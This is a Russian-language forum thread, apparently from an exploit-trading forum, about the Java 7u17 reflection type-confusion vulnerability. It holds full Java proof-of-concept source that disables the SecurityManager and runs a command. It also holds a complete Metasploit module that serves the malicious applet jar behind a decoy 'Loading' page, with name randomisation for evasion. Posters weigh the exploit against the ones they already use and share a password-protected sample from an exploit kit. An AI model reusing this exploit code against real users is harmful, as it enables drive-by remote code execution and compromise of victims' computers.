Java Applet Reflection Type Confusion Remote Code

[Falcon]

В общем сегодня всплыл очередной эксплоит под JRE:
https://dev.metasploit.com/redmine/projects...c2a38aa48029db3

первоисточник:
http://weblog.ikvm.net/PermaLink.aspx?guid...df-efa42ac237f0

import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;
import java.applet.Applet;

class Union1 {
  int field1;
  Object field2;
}

class Union2 {
  int field1;
  SystemClass field2;
}

class SystemClass {
  Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
    f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
    f24,f25,f26,f27,f28,f29,f30;
}

class PoC extends Applet {

	///
	public static void main(String[] args) throws Throwable {
  new PoC().init();
	}

	///
	public void init() {
        try
        {
            disableSecurityManager();
  	Runtime.getRuntime().exec("calc.exe");            
        }
        catch(Exception exception)
        {
            exception.printStackTrace();
        } catch(Throwable t) {
        	t.printStackTrace();
  }
    }

	///
	static void disableSecurityManager() throws Throwable 
	{
  MethodHandle mh1, mh2;
  mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
  mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
  Field fld1 = Union1.class.getDeclaredField("field1");
  Field fld2 = Union2.class.getDeclaredField("field1");
  Class classInt = int.class;
  Class classDouble = double.class;
  mh1.invokeExact(int.class);
  mh2.invokeExact((Class)null);
  Union1 u1 = new Union1();
  u1.field2 = System.class;
  Union2 u2 = new Union2();
  fld2.set(u2, fld1.get(u1));

  mh1.invokeExact(classDouble);
  mh2.invokeExact(classInt);

  if (u2.field2.f29 == System.getSecurityManager()) 
  {
    u2.field2.f29 = null;
  } 
  else if (u2.field2.f30 == System.getSecurityManager()) 
  {
    u2.field2.f30 = null;
  } 
  else 
  {
  	System.out.println("security manager field not found");
  }
	}    
}

замечу, что я его завести не смог, несмотря на модуль в метасплоите, на JRE 7u10 и 7u15 WinXPSP3 у меня стабильно java.lang.reflect.InvocationTargetException до момента инициализации апплета:

java.lang.reflect.InvocationTargetException
	at com.sun.deploy.util.DeployAWTUtil.invokeAndWait(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager.runOnEDT(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager.createApplet(Unknown Source)
	at sun.plugin2.applet.Plugin2Manager$AppletExecutionRunnable.run(Unknown Source)
	at java.lang.Thread.run(Unknown Source)
Caused by: java.lang.RuntimeException: java.lang.IllegalAccessException: Class sun.plugin2.applet.Plugin2Manager$12 can not access a member of class PoC with modifiers ""
	at sun.plugin2.applet.Plugin2Manager$12.run(Unknown Source)
	at java.awt.event.InvocationEvent.dispatch(Unknown Source)
	at java.awt.EventQueue.dispatchEventImpl(Unknown Source)
	at java.awt.EventQueue.access$200(Unknown Source)
	at java.awt.EventQueue$3.run(Unknown Source)
	at java.awt.EventQueue$3.run(Unknown Source)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.security.ProtectionDomain$1.doIntersectionPrivilege(Unknown Source)
	at java.awt.EventQueue.dispatchEvent(Unknown Source)
	at java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)
	at java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)
	at java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source)
	at java.awt.EventDispatchThread.pumpEvents(Unknown Source)
	at java.awt.EventDispatchThread.pumpEvents(Unknown Source)
	at java.awt.EventDispatchThread.run(Unknown Source)
Caused by: java.lang.IllegalAccessException: Class sun.plugin2.applet.Plugin2Manager$12 can not access a member of class PoC with modifiers ""
	at sun.reflect.Reflection.ensureMemberAccess(Unknown Source)
	at java.lang.Class.newInstance0(Unknown Source)
	at java.lang.Class.newInstance(Unknown Source)
	... 15 more
Exception: java.lang.reflect.InvocationTargetException

 

[cryptoff1]

свежак или не? в последнем хакере похожее постили

 

[Falcon]

В сети с 17 апреля, метасплоит модуль с 20го апреля, так что свежак в хорошем смысле этого слова.

 

[Gdark]

и смысла нет заводить, пока обхода для high level нету.

 

[pwd]

interestig
Contextis

 

[Aels]

мм.. в метасплойте написано "7u17 и более ранние". С какой версии баг присутствует? накрывает ли 6ю ветку? (тоесть, можно ли этим сплойтом заменить текушие два?)

 

[steklo]

Нет, он только под 1.7

 

[DarckSol]

тот же вариант в Метасплоите:

require 'msf/core'
require 'rex'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })
  
  def initialize( info = {} )
  
    super( update_info( info,
      'Name'          => 'Java Applet Reflection Type Confusion Remote Code Execution',
      'Description'   => %q{
          This module abuses Java Reflection to generate a Type Confusion, due to a weak
        access control when setting final fields on static classes, and run code outside of
        the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This
        exploit doesn't bypass click-to-play, so the user must accept the java warning in
        order to run the malicious applet.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Jeroen Frijters', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ]
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end
  
  
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union1.class")
    @union1_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union2.class")
    @union2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "SystemClass.class")
    @system_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
  
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end
  
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")
  
    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("Union1.class", @union1_class)
      jar.add_file("Union2.class", @union2_class)
      jar.add_file("SystemClass.class", @system_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest
  
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  
  end
  
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
  
end

 

[GOONER]

Сэмпл с кул-а, тот же что и в обзоре кафеина

Спойлер: 3 у вас 43

http://www.sendspace.com/file/o8vzw9
pass: damagelab